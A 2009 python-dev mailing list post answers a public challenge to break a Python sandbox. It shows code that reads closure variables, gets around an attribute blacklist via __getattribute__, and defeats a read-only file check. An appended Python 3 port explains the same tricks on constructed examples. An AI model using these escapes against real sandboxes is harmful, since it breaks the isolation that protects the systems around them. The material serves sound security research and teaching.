[Python-Dev] Challenge: Please break this! [Now with blog post] (original) (raw)
Victor Stinner victor.stinner at haypocalc.com
Tue Feb 24 01:31:55 CET 2009
- Previous message: [Python-Dev] Challenge: Please break this! [Now with blog post]
- Next message: [Python-Dev] Challenge: Please break this! [Now with blog post]
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Monday 23 February 2009 23:41:30, you wrote:
> http://tav.espians.com/a-challenge-to-break-python-security.html
> Please blog/retweet and of course, try the challenge yourselves =)
The challenge can be seen as: is it possible to read "secret" in the following code without using b.func_code, b.func_globals or b.func_closure:
def a():
    secret = 42
    def b():
        print(secret)
    return b

b = a()
secret = ???
With func_xxx, it's possible to get the secret with:
def get_cell_value(cell):
    return type(lambda: 0)((lambda x: lambda: x)(0).func_code, {}, None, None, (cell,))()
secret = get_cell_value(b.func_closure[0]) # 42
Function found at: http://code.activestate.com/recipes/439096/
But how can we get the closure if b.func_closure doesn't exist? Oh, wait! What's this: b.__getattribute__...

secret = get_cell_value(b.__getattribute__('func_closure')[0])
About FileReader, a full exploit:
from safelite import FileReader

def get_cell_value(cell):
    return type(lambda: 0)((lambda x: lambda: x)(0).func_code, {}, None, None, (cell,))()

# Create a 'w' string which is equal to 'r'
class Mode(str):
    def __str__(self):
        return self
    def __eq__(self, x):
        return x == 'r'
mode = Mode('w')

# The Mode instance passes the read-only mode check (mode == 'r' is True),
# but open() sees the characters 'w' and opens the file for writing
f = FileReader('0wn3d', mode)
fileobj = get_cell_value(f.tell.__getattribute__('func_closure')[0])
fileobj.write('twice!\n')
f.close()
-- Victor Stinner aka haypo http://www.haypocalc.com/blog/
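The three moves in the post above (building a function around a stolen closure cell, walking around an attribute-name blacklist via __getattribute__, and the str subclass whose == lies to the mode check), reproduced together as an added, self-contained Python 3 example. This is not code from the thread or from safelite: Python 3 spells func_code and func_closure as __code__ and __closure__, the read-only wrapper make_reader, the deny list FORBIDDEN and the filter sandbox_getattr are constructed stand-ins for the kind of check safelite was attempting, and the file written is a temporary one.

```python
import io
import os
import tempfile
import types


def a():
    secret = 42
    def b():
        print(secret)
    return b


b = a()


def get_cell_value(cell):
    """The recipe from the post, ported to Python 3 attribute names.

    type(lambda: 0) is types.FunctionType. A throwaway inner lambda gives a
    code object with exactly one free variable; FunctionType lets us attach
    any closure tuple to that code, and calling the result hands back
    whatever the supplied cell holds.
    """
    template = (lambda x: lambda: x)(0)          # template.__code__.co_freevars == ('x',)
    return types.FunctionType(template.__code__, {}, None, None, (cell,))()


def leak_secret(func):
    """func_closure became __closure__ in Python 3."""
    return get_cell_value(func.__closure__[0])


def leak_secret_direct(func):
    """Cells also expose their value directly; the recipe matters only where
    cell_contents itself is blocked or unavailable."""
    return func.__closure__[0].cell_contents


# Constructed stand-in for a sandbox that denies attribute access by name.
FORBIDDEN = frozenset({"__code__", "__globals__", "__closure__"})


def sandbox_getattr(obj, name):
    if name in FORBIDDEN:
        raise AttributeError("access to %s is blocked" % name)
    return getattr(obj, name)


def bypass_blacklist(func):
    """__getattribute__ is not on the list, and it receives the forbidden
    name as an ordinary string argument that the filter never inspects."""
    ga = sandbox_getattr(func, "__getattribute__")
    return get_cell_value(ga("__closure__")[0])


def make_reader(fileobj):
    """Constructed read-only wrapper in the shape the post attacks: every
    exposed method is a closure over the real file object."""
    def read(size=-1):
        return fileobj.read(size)

    def tell():
        return fileobj.tell()

    return types.SimpleNamespace(read=read, tell=tell)


def demo_reader_escape():
    backing = io.StringIO()
    reader = make_reader(backing)
    escaped = get_cell_value(reader.tell.__closure__[0])   # the raw object
    escaped.write("twice!\n")                              # writable after all
    return escaped is backing, backing.getvalue()


def demo_mode_bypass():
    """The str-subclass trick: an == based mode check is satisfied, while
    open() looks at the characters of the string and opens for writing."""
    class Mode(str):
        def __eq__(self, other):
            return other == "r"
        __hash__ = str.__hash__

    mode = Mode("w")
    allowed = mode in ("r", "rb")            # True: Mode.__eq__ answers for 'r'
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "0wn3d")      # temporary file, not a real target
        with open(path, mode) as fh:
            fh.write("twice!\n")
        with open(path) as fh:
            content = fh.read()
    return allowed, content


if __name__ == "__main__":
    print(leak_secret(b), leak_secret_direct(b), bypass_blacklist(b))
    print(demo_reader_escape())
    print(demo_mode_bypass())
```

The point a practitioner should take from running it: the cell was reachable by at least three routes (the FunctionType recipe, cell_contents, and __getattribute__ with the blocked name), so a sandbox that filters attribute names is patching symptoms; anything a closure references can be recovered by whoever can reach the function object.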